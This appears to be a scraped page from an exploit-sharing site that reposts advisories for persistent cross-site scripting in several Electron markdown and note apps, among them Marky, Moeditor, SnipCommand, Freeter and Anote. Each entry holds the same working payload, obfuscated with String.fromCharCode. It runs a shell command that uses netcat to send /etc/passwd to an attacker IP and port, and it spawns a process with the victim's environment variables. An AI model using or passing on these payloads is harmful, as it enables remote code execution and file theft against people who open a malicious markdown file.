    # Exploit Title: Marky 0.0.1 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/vesparny/marky # Version: 0.0.1 # Tested on: Linux, MacOs, Windows # Software Description: Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/qclfrUx # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
  10. HireHackking

    Moeditor 0.2.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Moeditor 0.2.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://moeditor.js.org/ # Version: 0.2.0 # Tested on: Windows, Linux, MacOs # Software Description: Software to view and edit sales documentation Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/UdP4JaX # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
  11. HireHackking

    SnipCommand 0.1.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SnipCommand 0.1.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/gurayyarar/SnipCommand # Version: 0.1.0 # Tested on: Windows, Linux, MacOs # Software Description: Open source command snippets manager for organize and copy fast. It helps you create, organize and store your commands (Excel formulas, Sql Queries, Terminal commands, etc.) with dynamic parameters for quick copy to it. Describe your commands with dynamic parameters also support documentation about your snippets. You can select or specify your dynamic values using with selectbox/inputbox for ready to paste the workspace. You can organize with tags. # Vulnerability Description: The software allows you to store payloads in the form of files or as titles in their dynamic values, once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/I2reH1M # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) <audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
  12. HireHackking

    StudyMD 0.3.2 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/jotron/StudyMD # Version: 0.3.2 # Tested on: Windows, Linux, MacOs # Software Description: A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard. Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure. # Vulnerability Description: The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/lDHKEIp # Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
  13. HireHackking

    Markright 1.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Markright 1.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/dvcrn/markright # Version: 1.0 # Tested on: Linux, MacOs,Windows # Software Description: A minimalist discount editor with github flavor, it allows to view, edit and load files with markdown extension (.md) quickly and with a friendly interface. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/VOsgKbZ # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
  14. HireHackking

    Freeter 1.2.1 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Freeter 1.2.1 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://freeter.io/ # Version: 1.2.1 # Tested on: Windows, Linux, MacOs # Software Description: It is an organizer for design, it allows you to work on as many projects as you want. with project drop-down menu facilities to switch between them easily. integrates widgets to set up a dashboard, giving you quick access to everything you need to work on a project. # Vulnerability Description: The software allows you to store payloads in the form of files or as custom widget titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/iBuKWm4 # Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) <audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
  15. HireHackking

    Anote 1.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/AnotherNote/anote # Version: 1.0 # Tested on: Linux, MacOs # Software Description: A simple opensource note app support markdown only, anote allows you to view and edit files markdown has a friendly interface for paste image paste html (includes retrieve image locally) export sale file with images export PDF support tray menu quick note (evernote inspired) cmd + v default will convert html. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/mFMDOuu # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) {"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)"} {"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}} {"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}
  16. HireHackking

    Markdownify 1.2.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Markdownify 1.2.0 - Persistent Cross-Site Scripting # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/amitmerchant1990/electron-markdownify # Version: 1.2.0 # Tested on: Windows, Linux, MacOs # Software Description: It is a lightweight editor for viewing and editing the markdown documentation of aYou can browse your personal folder to view and edit your files, change view / edit mode in md file with subject at the top. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof https://imgur.com/a/T4jBoiS # Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
  17. HireHackking

    Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
